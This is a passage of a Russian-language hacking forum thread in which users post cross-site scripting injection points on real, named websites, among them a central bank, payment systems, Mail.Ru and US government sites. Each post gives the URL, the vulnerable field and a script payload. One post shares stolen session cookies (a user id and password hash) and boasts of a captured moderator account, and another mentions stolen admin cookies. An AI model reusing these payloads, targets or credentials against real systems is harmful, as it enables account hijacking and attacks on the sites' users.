Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://www.bcb.gov.br/?id=MINUTES&ano=%3Cscript%3Ealert('XSS')%3C/script%3E
    Раздел сайта в DMOZ > Society > Government > Finance > Central_Banks
    ТИЦ90 PR8
    P.S Надеюсь модераторы оставят ;)
     
    #401 Фараон, 13 Jan 2011
    Last edited: 13 Jan 2011
    1 person likes this.
  2. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    Активная XSS на Mail.Ru в теле письма.

    /readmsg_translate?id=



    Практически заюзать можно использовав

    getenv("HTTP_REFERER"); (shell_c0de, ну ты понял!)

    На выходе получаем активную XSS в теле письма, код которой можно украсть, но заюзать может только владелец XSS. Единственная проблема это символ #, после которой реферрер не передается, и который используется Mail.Ru для открытия писем в фрейме.


    ps. Подробно обьяснять не буду, кому надо, тот догонит).
     
    _________________________
    #402 Uex Urgent, 15 Jan 2011
    Last edited: 15 Jan 2011
    4 people like this.
  3. Mr.Br0wn

    Mr.Br0wn Banned

    Joined:
    26 Oct 2009
    Messages:
    40
    Likes Received:
    12
    Reputations:
    2
    intellectmoney.ru

    платежная система которая стоит вконтакте.

    ТИЦ: 160
    PR: 3


    Бага находится по адресу:
    https://intellectmoney.ru/ru/enter/user_paycards/index.php

    в названии карты ставим любой html код, фильтрация отсутствует :)

    к примеру можно выполнить <script>alert()</script>
     
  4. shureg

    shureg Member

    Joined:
    18 Dec 2010
    Messages:
    1
    Likes Received:
    5
    Reputations:
    2
    XSS у webmoney!

    активная XXS уязвимость на сайте: merchant.webmoney.ru

    итак по порядку!
    1. https://merchant.webmoney.ru нужно авторизовать WMID
    2. перейти по ссылке: Настройки (https://merchant.webmoney.ru/conf/purses.asp)
    3. выбрать произвольный кошелек и кликнуть по ссылке: настроить (ссылка вида: https://merchant.webmoney.ru/conf/purse.asp?p=ВАШ_КОШЕЛЕК)
    4. в поля: Result URL, Success URL, Fail URL, вписать: ("><script>alert()</script>)
    5. сохранить


    ---------------------------------------------------
    Администрации об этой сообшике сообщенно! возможно скоро прекратит свое существование
    ------------ UPD---------------------------------
    админы вэбмани ответили, что это так и задумывалось =)))) пользуемся наздоровье
     
    #404 shureg, 28 Jan 2011
    Last edited: 1 Feb 2011
    1 person likes this.
  5. ToozPick

    ToozPick New Member

    Joined:
    25 Nov 2010
    Messages:
    5
    Likes Received:
    3
    Reputations:
    0
    Крупный треккер Украины. Тиц 100,Я Rank 3/6,PR 5.
    http://pslan.kiev.ua/downloadit.php?id=171462&name=%3Ci%3Et00z%3C/i%3E
    Уязвим параметр name.Для просмотра нужна регистрация.
    Чтоб не регится,можем юзать уже краденые печеньки :
    Code:
    uid=403942
    pass=672b01c07e1347405b5dd9127aecee24
    ~
    Акк модератора уже в наличии ;)
     
    #405 ToozPick, 8 May 2011
    Last edited: 8 May 2011
    1 person likes this.
  6. NemTaq

    NemTaq Member

    Joined:
    11 Aug 2010
    Messages:
    115
    Likes Received:
    19
    Reputations:
    14
    Pentagon Library

    http://www.whs.mil/library/dir.html

    POST запросом в поле "Area Code"
    "><script>alert(/xss/)</script>


    U.S. Government Printing Office
    тута уже get
    уязвимо два параметра
    http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=<script>alert(/xss/)</script>&docid="><script>alert(/xss/)</script>
     
    #406 NemTaq, 28 Jun 2011
    Last edited: 28 Jun 2011
    1 person likes this.
  7. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    сайт- http://victorov.su/md5/
    шифруем наш код в md5: "><script>alert();</script><"
    И теперь расшифровываем полученый хеш - a4c2307f111c68d97e8bb44ed7e9401c,
    и вуаля! Код исполняется, пример - http://victorov.su/md5/?md5e=&md5d=a4c2307f111c68d97e8bb44ed7e9401c
     
    _________________________
    4 people like this.
  8. COOLBOY007

    COOLBOY007 Elder - Старейшина

    Joined:
    9 Jun 2009
    Messages:
    76
    Likes Received:
    43
    Reputations:
    22
    Code:
    http://www.fema.gov/library/viewRecord.do?id=%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
    Google PR - 9
    тИЦ - 180
     
    #408 COOLBOY007, 24 Jul 2011
    Last edited: 26 Jul 2011
  9. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    http://www.salajeanul.ro/index.php?cmd=article

    Отсутствует фильтрация входных данных в полях формы комментирования
    Уязвимые поля
     
    1 person likes this.
  10. NemTaq

    NemTaq Member

    Joined:
    11 Aug 2010
    Messages:
    115
    Likes Received:
    19
    Reputations:
    14
    БГУ (Минск)

    http://phone.bsu.by/

    Уязвимые поля:
    "ФИО" - "><script>alert(/1/)</script>
    "Подразделение" - "><script>alert(/1/)</script>
     
  11. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Active XSS
    http://www.ayda.ru/

    Требуется регистрация.
    если лень делать временное мыло, то
    http://www.ayda.ru/stories/write_story.php
    Добавляем историю и не надо подтверждать регу.

    профиль http://www.ayda.ru/my/profile.php
    Уязвимое поле:
    * Имя: Vlad<script>console.log("asd")</script>
     
  12. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Active XSS
    https://spb.shop.megafon.ru/

    Требуется регистрация.

    https://spb.shop.megafon.ru/setup/delivery_info.html
    Уязвимое поле - адрес

    [​IMG]
    [​IMG]
     
    #412 justonline, 17 Sep 2011
    Last edited: 17 Sep 2011
    4 people like this.
  13. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Active XSS
    http://www.kupikupon.ru/contact
    Яндекс тИЦ - 350
    Пр - 3



    Уязвимы все поля.
    [​IMG]
     
    #413 justonline, 20 Sep 2011
    Last edited: 20 Sep 2011
    1 person likes this.
  14. Юго

    Юго Member

    Joined:
    2 Feb 2011
    Messages:
    0
    Likes Received:
    77
    Reputations:
    17
    Сайт http://www.cskabasket.com/

    Постим коммент
     
    1 person likes this.
  15. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    Провайдер Казахстана

    http://cabinet.megaline.kz/billing-dealer/restore-password.do
    Вводим в поле "Шаг 1":
    HTML:
    еб*нутый<h2>Мде. Еще провайдером называются...</h2> Совести
    Ну и результат:
    [​IMG]



    P.S. Еще года два назад заметил эту XSS, до сих пор живa o_O
     
    #415 Kuteke, 24 Sep 2011
    Last edited: 24 Sep 2011
  16. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Еще один скидочный сервис от меня)))

    Active XSS:
    http://bigbuzzy.ru/

    Уязвимость в Личном кабинете. В поле Имя и Фамилия( в самом кабинете фильтруются символы при выводе...а в акциях нет.

    Яндекс тИЦ (CY) 220
    Alexa Rank 11,757 -9,013
    Google PageRank (PR) 4


    [​IMG]
    [​IMG]
     
    1 person likes this.
  17. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Active XSS
    http://www.directadvert.ru/user/

    Яндекс тИЦ (CY) 190
    Alexa Rank 1,697 -286
    Google PageRank (PR) 5

    Хосты 542,037
    http://www.liveinternet.ru/stat/directadvert.ru/

    Уязвимы все поля при создании рекламной компании.

    [​IMG]
     
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Active XSS
    биржа трафика- http://www.alltraf.com/
    (в определенных кругах - популярна и очень странно что тиц 0)

    При создании рекламной компании уязвимо поле с урлом.
    [​IMG]
    а вот и куки админке.
     
    3 people like this.
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Active XSS

    Сайт продажи электронных билетов - достаточно поппулярный

    e-traffic.ru

    [​IMG]

    PR = 0
    Тиц = 30

    Админка тут - /admin/

    Уязвимые поля:

    Имя = <script>alert('a4at')</script>
    Отчество = <script>alert('a4at')</script>
     
    _________________________
    #419 BigBear, 4 Oct 2011
    Last edited: 4 Oct 2011
  20. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    html5demos.com

    PR = 6
    ТиЦ = 40

    Множественные уязвимости:


    http://html5demos.com/postmessage
    http://html5demos.com/postmessage2
    http://html5demos.com/storage

    Вставляем в поля
    Code:
    <img src='1231231' onerror='alert("hacked")'/>
    и радуемся!

    [​IMG]

    Вот ещё:
    http://html5demos.com/drag-anything​
    Копируем нашу ксс и переносим в поле для драг-н-дропа.

    [​IMG]
     
    _________________________
    2 people like this.